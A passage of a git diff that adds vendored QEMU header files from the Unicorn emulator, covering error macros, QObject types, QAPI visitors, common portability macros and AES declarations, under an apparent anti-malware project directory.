+#define QERR_DEVICE_INIT_FAILED \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' could not be initialized" + +#define QERR_DEVICE_IN_USE \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' is in use" + +#define QERR_DEVICE_IS_READ_ONLY \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' is read only" + +#define QERR_DEVICE_NO_HOTPLUG \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' does not support hotplugging" + +#define QERR_DEVICE_NOT_ACTIVE \ + ERROR_CLASS_DEVICE_NOT_ACTIVE, "No %s device has been activated" + +#define QERR_DEVICE_NOT_ENCRYPTED \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' is not encrypted" + +#define QERR_DEVICE_NOT_FOUND \ + ERROR_CLASS_DEVICE_NOT_FOUND, "Device '%s' not found" + +#define QERR_FD_NOT_FOUND \ + ERROR_CLASS_GENERIC_ERROR, "File descriptor named '%s' not found" + +#define QERR_FD_NOT_SUPPLIED \ + ERROR_CLASS_GENERIC_ERROR, "No file descriptor supplied via SCM_RIGHTS" + +#define QERR_FEATURE_DISABLED \ + ERROR_CLASS_GENERIC_ERROR, "The feature '%s' is not enabled" + +#define QERR_INVALID_BLOCK_FORMAT \ + ERROR_CLASS_GENERIC_ERROR, "Invalid block format '%s'" + +#define QERR_INVALID_PARAMETER \ + ERROR_CLASS_GENERIC_ERROR, "Invalid parameter '%s'" + +#define QERR_INVALID_PARAMETER_TYPE \ + ERROR_CLASS_GENERIC_ERROR, "Invalid parameter type for '%s', expected: %s" + +#define QERR_INVALID_PARAMETER_VALUE \ + ERROR_CLASS_GENERIC_ERROR, "Parameter '%s' expects %s" + +#define QERR_INVALID_PASSWORD \ + ERROR_CLASS_GENERIC_ERROR, "Password incorrect" + +#define QERR_IO_ERROR \ + ERROR_CLASS_GENERIC_ERROR, "An IO error has occurred" + +#define QERR_JSON_PARSING \ + ERROR_CLASS_GENERIC_ERROR, "Invalid JSON syntax" + +#define QERR_KVM_MISSING_CAP \ + ERROR_CLASS_KVM_MISSING_CAP, "Using KVM without %s, %s unavailable" + +#define QERR_MIGRATION_ACTIVE \ + ERROR_CLASS_GENERIC_ERROR, "There's a migration process in progress" + +#define QERR_MISSING_PARAMETER \ + ERROR_CLASS_GENERIC_ERROR, "Parameter '%s' is missing" + +#define QERR_PERMISSION_DENIED \ + ERROR_CLASS_GENERIC_ERROR, "Insufficient permission to perform this operation" + +#define QERR_PROPERTY_VALUE_BAD \ + ERROR_CLASS_GENERIC_ERROR, "Property '%s.%s' doesn't take value '%s'" + +#define QERR_PROPERTY_VALUE_OUT_OF_RANGE \ + ERROR_CLASS_GENERIC_ERROR, "Property %s.%s doesn't take value %" PRId64 " (minimum: %" PRId64 ", maximum: %" PRId64 ")" + +#define QERR_QGA_COMMAND_FAILED \ + ERROR_CLASS_GENERIC_ERROR, "Guest agent command failed, error was '%s'" + +#define QERR_QMP_BAD_INPUT_OBJECT \ + ERROR_CLASS_GENERIC_ERROR, "Expected '%s' in QMP input" + +#define QERR_QMP_BAD_INPUT_OBJECT_MEMBER \ + ERROR_CLASS_GENERIC_ERROR, "QMP input object member '%s' expects '%s'" + +#define QERR_QMP_EXTRA_MEMBER \ + ERROR_CLASS_GENERIC_ERROR, "QMP input object member '%s' is unexpected" + +#define QERR_SET_PASSWD_FAILED \ + ERROR_CLASS_GENERIC_ERROR, "Could not set password" + +#define QERR_UNDEFINED_ERROR \ + ERROR_CLASS_GENERIC_ERROR, "An undefined error has occurred" + +#define QERR_UNKNOWN_BLOCK_FORMAT_FEATURE \ + ERROR_CLASS_GENERIC_ERROR, "'%s' uses a %s feature which is not supported by this qemu version: %s" + +#define QERR_UNSUPPORTED \ + ERROR_CLASS_GENERIC_ERROR, "this feature or command is not currently supported" + +#endif /* QERROR_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qfloat.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qfloat.h new file mode 100644 index 0000000..b068ed3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qfloat.h @@ -0,0 +1,29 @@ +/* + * QFloat Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QFLOAT_H +#define QFLOAT_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QFloat { + QObject_HEAD; + double value; +} QFloat; + +QFloat *qfloat_from_double(double value); +double qfloat_get_double(const QFloat *qi); +QFloat *qobject_to_qfloat(const QObject *obj); + +#endif /* QFLOAT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qint.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qint.h new file mode 100644 index 0000000..0150b7e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qint.h @@ -0,0 +1,28 @@ +/* + * QInt Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef QINT_H +#define QINT_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QInt { + QObject_HEAD; + int64_t value; +} QInt; + +QInt *qint_from_int(int64_t value); +int64_t qint_get_int(const QInt *qi); +QInt *qobject_to_qint(const QObject *obj); + +#endif /* QINT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qjson.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qjson.h new file mode 100644 index 0000000..ee4d31a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qjson.h @@ -0,0 +1,29 @@ +/* + * QObject JSON integration + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QJSON_H +#define QJSON_H + +#include <stdarg.h> +#include "qemu/compiler.h" +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qstring.h" + +QObject *qobject_from_json(const char *string); +QObject *qobject_from_jsonf(const char *string, ...) GCC_FMT_ATTR(1, 2); +QObject *qobject_from_jsonv(const char *string, va_list *ap) GCC_FMT_ATTR(1, 0); + +QString *qobject_to_json(const QObject *obj); +QString *qobject_to_json_pretty(const QObject *obj); + +#endif /* QJSON_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qlist.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qlist.h new file mode 100644 index 0000000..6cc4831 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qlist.h @@ -0,0 +1,63 @@ +/* + * QList Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef QLIST_H +#define QLIST_H + +#include "qapi/qmp/qobject.h" +#include "qemu/queue.h" + +typedef struct QListEntry { + QObject *value; + QTAILQ_ENTRY(QListEntry) next; +} QListEntry; + +typedef struct QList { + QObject_HEAD; + QTAILQ_HEAD(,QListEntry) head; +} QList; + +#define qlist_append(qlist, obj) \ + qlist_append_obj(qlist, QOBJECT(obj)) + +#define QLIST_FOREACH_ENTRY(qlist, var) \ + for ((var) = ((qlist)->head.tqh_first); \ + (var); \ + (var) = ((var)->next.tqe_next)) + +static inline QObject *qlist_entry_obj(const QListEntry *entry) +{ + return entry->value; +} + +QList *qlist_new(void); +QList *qlist_copy(QList *src); +void qlist_append_obj(QList *qlist, QObject *obj); +void qlist_iter(const QList *qlist, + void (*iter)(QObject *obj, void *opaque), void *opaque); +QObject *qlist_pop(QList *qlist); +QObject *qlist_peek(QList *qlist); +int qlist_empty(const QList *qlist); +size_t qlist_size(const QList *qlist); +QList *qobject_to_qlist(const QObject *obj); + +static inline const QListEntry *qlist_first(const QList *qlist) +{ + return QTAILQ_FIRST(&qlist->head); +} + +static inline const QListEntry *qlist_next(const QListEntry *entry) +{ + return QTAILQ_NEXT(entry, next); +} + +#endif /* QLIST_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qobject.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qobject.h new file mode 100644 index 0000000..d0bbc7c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qobject.h @@ -0,0 +1,113 @@ +/* + * QEMU Object Model. + * + * Based on ideas by Avi Kivity <avi@redhat.com> + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + * QObject Reference Counts Terminology + * ------------------------------------ + * + * - Returning references: A function that returns an object may + * return it as either a weak or a strong reference. If the reference + * is strong, you are responsible for calling QDECREF() on the reference + * when you are done. + * + * If the reference is weak, the owner of the reference may free it at + * any time in the future. Before storing the reference anywhere, you + * should call QINCREF() to make the reference strong. + * + * - Transferring ownership: when you transfer ownership of a reference + * by calling a function, you are no longer responsible for calling + * QDECREF() when the reference is no longer needed. In other words, + * when the function returns you must behave as if the reference to the + * passed object was weak. + */ +#ifndef QOBJECT_H +#define QOBJECT_H + +#include <stddef.h> +#include <assert.h> + +typedef enum { + QTYPE_NONE, + QTYPE_QINT, + QTYPE_QSTRING, + QTYPE_QDICT, + QTYPE_QLIST, + QTYPE_QFLOAT, + QTYPE_QBOOL, + QTYPE_QERROR, + QTYPE_MAX, +} qtype_code; + +struct QObject; + +typedef struct QType { + qtype_code code; + void (*destroy)(struct QObject *); +} QType; + +typedef struct QObject { + const QType *type; + size_t refcnt; +} QObject; + +/* Objects definitions must include this */ +#define QObject_HEAD \ + QObject base + +/* Get the 'base' part of an object */ +#define QOBJECT(obj) (&(obj)->base) + +/* High-level interface for qobject_incref() */ +#define QINCREF(obj) \ + qobject_incref(QOBJECT(obj)) + +/* High-level interface for qobject_decref() */ +#define QDECREF(obj) \ + qobject_decref(obj ? QOBJECT(obj) : NULL) + +/* Initialize an object to default values */ +#define QOBJECT_INIT(obj, qtype_type) \ + obj->base.refcnt = 1; \ + obj->base.type = qtype_type + +/** + * qobject_incref(): Increment QObject's reference count + */ +static inline void qobject_incref(QObject *obj) +{ + if (obj) + obj->refcnt++; +} + +/** + * qobject_decref(): Decrement QObject's reference count, deallocate + * when it reaches zero + */ +static inline void qobject_decref(QObject *obj) +{ + if (obj && --obj->refcnt == 0) { + assert(obj->type != NULL); + assert(obj->type->destroy != NULL); + obj->type->destroy(obj); + } +} + +/** + * qobject_type(): Return the QObject's type + */ +static inline qtype_code qobject_type(const QObject *obj) +{ + assert(obj->type != NULL); + return obj->type->code; +} + +#endif /* QOBJECT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qstring.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qstring.h new file mode 100644 index 0000000..734e912 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qstring.h @@ -0,0 +1,36 @@ +/* + * QString Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef QSTRING_H +#define QSTRING_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QString { + QObject_HEAD; + char *string; + size_t length; + size_t capacity; +} QString; + +QString *qstring_new(void); +QString *qstring_from_str(const char *str); +QString *qstring_from_substr(const char *str, int start, int end); +size_t qstring_get_length(const QString *qstring); +const char *qstring_get_str(const QString *qstring); +void qstring_append_int(QString *qstring, int64_t value); +void qstring_append(QString *qstring, const char *str); +void qstring_append_chr(QString *qstring, int c); +QString *qobject_to_qstring(const QObject *obj); + +#endif /* QSTRING_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/types.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/types.h new file mode 100644 index 0000000..7782ec5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/types.h @@ -0,0 +1,25 @@ +/* + * Include all QEMU objects. + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef QEMU_OBJECTS_H +#define QEMU_OBJECTS_H + +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qfloat.h" +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qstring.h" +#include "qapi/qmp/qdict.h" +#include "qapi/qmp/qlist.h" +#include "qapi/qmp/qjson.h" + +#endif /* QEMU_OBJECTS_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/string-input-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/string-input-visitor.h new file mode 100644 index 0000000..089243c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/string-input-visitor.h @@ -0,0 +1,25 @@ +/* + * String parsing Visitor + * + * Copyright Red Hat, Inc. 2012 + * + * Author: Paolo Bonzini <pbonzini@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef STRING_INPUT_VISITOR_H +#define STRING_INPUT_VISITOR_H + +#include "qapi/visitor.h" + +typedef struct StringInputVisitor StringInputVisitor; + +StringInputVisitor *string_input_visitor_new(const char *str); +void string_input_visitor_cleanup(StringInputVisitor *v); + +Visitor *string_input_get_visitor(StringInputVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor-impl.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor-impl.h new file mode 100644 index 0000000..09bb0fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor-impl.h @@ -0,0 +1,67 @@ +/* + * Core Definitions for QAPI Visitor implementations + * + * Copyright (C) 2012 Red Hat, Inc. + * + * Author: Paolo Bonizni <pbonzini@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ +#ifndef QAPI_VISITOR_IMPL_H +#define QAPI_VISITOR_IMPL_H + +#include "qapi/error.h" +#include "qapi/visitor.h" + +struct Visitor +{ + /* Must be set */ + void (*start_struct)(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp); + void (*end_struct)(Visitor *v, Error **errp); + + void (*start_implicit_struct)(Visitor *v, void **obj, size_t size, + Error **errp); + void (*end_implicit_struct)(Visitor *v, Error **errp); + + void (*start_list)(Visitor *v, const char *name, Error **errp); + GenericList *(*next_list)(Visitor *v, GenericList **list, Error **errp); + void (*end_list)(Visitor *v, Error **errp); + + void (*type_enum)(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); + void (*get_next_type)(Visitor *v, int *kind, const int *qobjects, + const char *name, Error **errp); + + void (*type_int)(Visitor *v, int64_t *obj, const char *name, Error **errp); + void (*type_bool)(Visitor *v, bool *obj, const char *name, Error **errp); + void (*type_str)(Visitor *v, char **obj, const char *name, Error **errp); + void (*type_number)(Visitor *v, double *obj, const char *name, + Error **errp); + + /* May be NULL */ + void (*optional)(Visitor *v, bool *present, const char *name, + Error **errp); + + void (*type_uint8)(Visitor *v, uint8_t *obj, const char *name, Error **errp); + void (*type_uint16)(Visitor *v, uint16_t *obj, const char *name, Error **errp); + void (*type_uint32)(Visitor *v, uint32_t *obj, const char *name, Error **errp); + void (*type_uint64)(Visitor *v, uint64_t *obj, const char *name, Error **errp); + void (*type_int8)(Visitor *v, int8_t *obj, const char *name, Error **errp); + void (*type_int16)(Visitor *v, int16_t *obj, const char *name, Error **errp); + void (*type_int32)(Visitor *v, int32_t *obj, const char *name, Error **errp); + void (*type_int64)(Visitor *v, int64_t *obj, const char *name, Error **errp); + /* visit_type_size() falls back to (*type_uint64)() if type_size is unset */ + void (*type_size)(Visitor *v, uint64_t *obj, const char *name, Error **errp); + bool (*start_union)(Visitor *v, bool data_present, Error **errp); + void (*end_union)(Visitor *v, bool data_present, Error **errp); +}; + +void input_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); +void output_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor.h new file mode 100644 index 0000000..5934f59 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor.h @@ -0,0 +1,64 @@ +/* + * Core Definitions for QAPI Visitor Classes + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ +#ifndef QAPI_VISITOR_CORE_H +#define QAPI_VISITOR_CORE_H + +#include "qemu/typedefs.h" +#include "qapi/qmp/qobject.h" +#include "qapi/error.h" +#include <stdlib.h> + +typedef struct GenericList +{ + union { + void *value; + uint64_t padding; + }; + struct GenericList *next; +} GenericList; + +void visit_start_handle(Visitor *v, void **obj, const char *kind, + const char *name, Error **errp); +void visit_end_handle(Visitor *v, Error **errp); +void visit_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp); +void visit_end_struct(Visitor *v, Error **errp); +void visit_start_implicit_struct(Visitor *v, void **obj, size_t size, + Error **errp); +void visit_end_implicit_struct(Visitor *v, Error **errp); +void visit_start_list(Visitor *v, const char *name, Error **errp); +GenericList *visit_next_list(Visitor *v, GenericList **list, Error **errp); +void visit_end_list(Visitor *v, Error **errp); +void visit_optional(Visitor *v, bool *present, const char *name, + Error **errp); +void visit_get_next_type(Visitor *v, int *obj, const int *qtypes, + const char *name, Error **errp); +void visit_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); +void visit_type_int(Visitor *v, int64_t *obj, const char *name, Error **errp); +void visit_type_uint8(Visitor *v, uint8_t *obj, const char *name, Error **errp); +void visit_type_uint16(Visitor *v, uint16_t *obj, const char *name, Error **errp); +void visit_type_uint32(Visitor *v, uint32_t *obj, const char *name, Error **errp); +void visit_type_uint64(Visitor *v, uint64_t *obj, const char *name, Error **errp); +void visit_type_int8(Visitor *v, int8_t *obj, const char *name, Error **errp); +void visit_type_int16(Visitor *v, int16_t *obj, const char *name, Error **errp); +void visit_type_int32(Visitor *v, int32_t *obj, const char *name, Error **errp); +void visit_type_int64(Visitor *v, int64_t *obj, const char *name, Error **errp); +void visit_type_size(Visitor *v, uint64_t *obj, const char *name, Error **errp); +void visit_type_bool(Visitor *v, bool *obj, const char *name, Error **errp); +void visit_type_str(Visitor *v, char **obj, const char *name, Error **errp); +void visit_type_number(Visitor *v, double *obj, const char *name, Error **errp); +bool visit_start_union(Visitor *v, bool data_present, Error **errp); +void visit_end_union(Visitor *v, bool data_present, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu-common.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu-common.h new file mode 100644 index 0000000..d2097db --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu-common.h @@ -0,0 +1,252 @@ + +/* Common header file that is included by all of QEMU. + * + * This file is supposed to be included only by .c files. No header file should + * depend on qemu-common.h, as this would easily lead to circular header + * dependencies. + * + * If a header file uses a definition from qemu-common.h, that definition + * must be moved to a separate header file, and the header that uses it + * must include that header. + */ +#ifndef QEMU_COMMON_H +#define QEMU_COMMON_H + +#include "qemu/compiler.h" +#include "config-host.h" +#include "qemu/typedefs.h" +#include "exec/cpu-common.h" + +#if defined(__arm__) || defined(__sparc__) || defined(__mips__) || defined(__hppa__) || defined(__ia64__) +#define WORDS_ALIGNED +#endif + +#define TFR(expr) do { if ((expr) != -1) break; } while (errno == EINTR) + +/* we put basic includes here to avoid repeating them in device drivers */ +#include <stdlib.h> +#include <stdio.h> +#include <stdarg.h> +#include "unicorn/platform.h" +#include <string.h> +#include <limits.h> +#include <time.h> +#include <ctype.h> +#include <errno.h> +#include <fcntl.h> +#include <sys/stat.h> +#include <assert.h> +#include "glib_compat.h" + +#ifdef _WIN32 +#include "sysemu/os-win32.h" +#endif + +#ifndef O_LARGEFILE +#define O_LARGEFILE 0 +#endif +#ifndef O_BINARY +#define O_BINARY 0 +#endif +#ifndef MAP_ANONYMOUS +#define MAP_ANONYMOUS MAP_ANON +#endif +#ifndef ENOMEDIUM +#define ENOMEDIUM ENODEV +#endif +#if !defined(ENOTSUP) +#define ENOTSUP 4096 +#endif +#if !defined(ECANCELED) +#define ECANCELED 4097 +#endif +#if !defined(EMEDIUMTYPE) +#define EMEDIUMTYPE 4098 +#endif +#ifndef TIME_MAX +#define TIME_MAX LONG_MAX +#endif + +/* HOST_LONG_BITS is the size of a native pointer in bits. */ +#if UINTPTR_MAX == UINT32_MAX +# define HOST_LONG_BITS 32 +#elif UINTPTR_MAX == UINT64_MAX +# define HOST_LONG_BITS 64 +#else +# error Unknown pointer size +#endif + +typedef int (*fprintf_function)(FILE *f, const char *fmt, ...) + GCC_FMT_ATTR(2, 3); + +#ifdef _WIN32 +#define fsync _commit +#if !defined(lseek) +# define lseek _lseeki64 +#endif +int qemu_ftruncate64(int, int64_t); +#if !defined(ftruncate) +# define ftruncate qemu_ftruncate64 +#endif +#endif + +#include "qemu/osdep.h" +#include "qemu/bswap.h" + +/* FIXME: Remove NEED_CPU_H. */ +#ifdef NEED_CPU_H +#include "cpu.h" +#endif /* !defined(NEED_CPU_H) */ + +/* cutils.c */ +void pstrcpy(char *buf, int buf_size, const char *str); +char *pstrcat(char *buf, int buf_size, const char *s); +int strstart(const char *str, const char *val, const char **ptr); +int qemu_fls(int i); + +/* + * strtosz() suffixes used to specify the default treatment of an + * argument passed to strtosz() without an explicit suffix. + * These should be defined using upper case characters in the range + * A-Z, as strtosz() will use qemu_toupper() on the given argument + * prior to comparison. + */ +#define STRTOSZ_DEFSUFFIX_EB 'E' +#define STRTOSZ_DEFSUFFIX_PB 'P' +#define STRTOSZ_DEFSUFFIX_TB 'T' +#define STRTOSZ_DEFSUFFIX_GB 'G' +#define STRTOSZ_DEFSUFFIX_MB 'M' +#define STRTOSZ_DEFSUFFIX_KB 'K' +#define STRTOSZ_DEFSUFFIX_B 'B' +int64_t strtosz(const char *nptr, char **end); +int64_t strtosz_suffix(const char *nptr, char **end, const char default_suffix); +int64_t strtosz_suffix_unit(const char *nptr, char **end, + const char default_suffix, int64_t unit); + +/* used to print char* safely */ +#define STR_OR_NULL(str) ((str) ? (str) : "null") + +#define qemu_isalnum(c) isalnum((unsigned char)(c)) +#define qemu_isalpha(c) isalpha((unsigned char)(c)) +#define qemu_iscntrl(c) iscntrl((unsigned char)(c)) +#define qemu_isdigit(c) isdigit((unsigned char)(c)) +#define qemu_isgraph(c) isgraph((unsigned char)(c)) +#define qemu_islower(c) islower((unsigned char)(c)) +#define qemu_isprint(c) isprint((unsigned char)(c)) +#define qemu_ispunct(c) ispunct((unsigned char)(c)) +#define qemu_isspace(c) isspace((unsigned char)(c)) +#define qemu_isupper(c) isupper((unsigned char)(c)) +#define qemu_isxdigit(c) isxdigit((unsigned char)(c)) +#define qemu_tolower(c) tolower((unsigned char)(c)) +#define qemu_toupper(c) toupper((unsigned char)(c)) +#define qemu_isascii(c) isascii((unsigned char)(c)) +#define qemu_toascii(c) toascii((unsigned char)(c)) + +void *qemu_oom_check(void *ptr); + +#ifdef _WIN32 +/* MinGW needs type casts for the 'buf' and 'optval' arguments. */ +#define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ + getsockopt(sockfd, level, optname, (void *)optval, optlen) +#define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ + setsockopt(sockfd, level, optname, (const void *)optval, optlen) +#define qemu_recv(sockfd, buf, len, flags) recv(sockfd, (void *)buf, len, flags) +#define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ + sendto(sockfd, (const void *)buf, len, flags, destaddr, addrlen) +#else +#define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ + getsockopt(sockfd, level, optname, optval, optlen) +#define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ + setsockopt(sockfd, level, optname, optval, optlen) +#define qemu_recv(sockfd, buf, len, flags) recv(sockfd, buf, len, flags) +#define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ + sendto(sockfd, buf, len, flags, destaddr, addrlen) +#endif + +/* Error handling. */ + +void tcg_exec_init(struct uc_struct *uc, unsigned long tb_size); +bool tcg_enabled(struct uc_struct *uc); + +struct uc_struct; +void cpu_exec_init_all(struct uc_struct *uc); + +/* compute with 96 bit intermediate result: (a*b)/c */ +static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) +{ + union { + uint64_t ll; + struct { +#ifdef HOST_WORDS_BIGENDIAN + uint32_t high, low; +#else + uint32_t low, high; +#endif + } l; + } u, res; + uint64_t rl, rh; + + u.ll = a; + rl = (uint64_t)u.l.low * (uint64_t)b; + rh = (uint64_t)u.l.high * (uint64_t)b; + rh += (rl >> 32); + res.l.high = (uint32_t)(rh / c); + res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; + return res.ll; +} + +/* Round number down to multiple */ +#define QEMU_ALIGN_DOWN(n, m) ((n) / (m) * (m)) + +/* Round number up to multiple */ +#define QEMU_ALIGN_UP(n, m) QEMU_ALIGN_DOWN((n) + (m) - 1, (m)) + +#include "qemu/module.h" + +/* vector definitions */ +#ifdef __ALTIVEC__ +/* The altivec.h header says we're allowed to undef these for + * C++ compatibility. Here we don't care about C++, but we + * undef them anyway to avoid namespace pollution. + */ +#undef vector +#undef pixel +#undef bool +#include <altivec.h> +#define VECTYPE __vector unsigned char +#define SPLAT(p) vec_splat(vec_ld(0, p), 0) +#define ALL_EQ(v1, v2) vec_all_eq(v1, v2) +/* altivec.h may redefine the bool macro as vector type. + * Reset it to POSIX semantics. */ +#define bool _Bool +#elif defined __SSE2__ +#include <emmintrin.h> +#define VECTYPE __m128i +#define SPLAT(p) _mm_set1_epi8(*(p)) +#define ALL_EQ(v1, v2) (_mm_movemask_epi8(_mm_cmpeq_epi8(v1, v2)) == 0xFFFF) +#else +#define VECTYPE unsigned long +#define SPLAT(p) (*(p) * (~0UL / 255)) +#define ALL_EQ(v1, v2) ((v1) == (v2)) +#endif + +// support for calling functions before main code is executed. +#if defined(_MSC_VER) + #pragma section(".CRT$XCU",read) + #define INITIALIZER2_(f,p) \ + static void f(void); \ + __declspec(allocate(".CRT$XCU")) void (*f##_)(void) = f; \ + __pragma(comment(linker,"/include:" p #f "_")) \ + static void f(void) + #ifdef _WIN64 + #define INITIALIZER(f) INITIALIZER2_(f,"") + #else + #define INITIALIZER(f) INITIALIZER2_(f,"_") + #endif +#else + #define INITIALIZER(f) \ + static void f(void) __attribute__((constructor)); \ + static void f(void) +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/aes.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/aes.h new file mode 100644 index 0000000..63438ad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/aes.h @@ -0,0 +1,68 @@ +#ifndef QEMU_AES_H +#define QEMU_AES_H + +#define AES_MAXNR 14 +#define AES_BLOCK_SIZE 16 + +struct aes_key_st { + uint32_t rd_key[4 *(AES_MAXNR + 1)]; + int rounds; +}; +typedef struct aes_key_st AES_KEY; + +/* FreeBSD has its own AES_set_decrypt_key in -lcrypto, avoid conflicts */ +#ifdef __FreeBSD__ +#define AES_set_encrypt_key QEMU_AES_set_encrypt_key +#define AES_set_decrypt_key QEMU_AES_set_decrypt_key +#define AES_encrypt QEMU_AES_encrypt +#define AES_decrypt QEMU_AES_decrypt +#define AES_cbc_encrypt QEMU_AES_cbc_encrypt +#endif + +int AES_set_encrypt_key(const unsigned char *userKey, const int bits, + AES_KEY *key); +int AES_set_decrypt_key(const unsigned char *userKey, const int bits, + AES_KEY *key); + +void AES_encrypt(const unsigned char *in, unsigned char *out, + const AES_KEY *key); +void AES_decrypt(const unsigned char *in, unsigned char *out, + const AES_KEY *key); +void AES_cbc_encrypt(const unsigned char *in, unsigned char *out, + const unsigned long length, const AES_KEY *key, + unsigned char *ivec, const int enc); + +extern const uint8_t AES_sbox[256]; +extern const uint8_t AES_isbox[256]; + +/* AES ShiftRows and InvShiftRows */ +extern const uint8_t AES_shifts[16]; +extern const uint8_t AES_ishifts[16]; + +/* AES InvMixColumns */ +/* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ +/* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ +/* 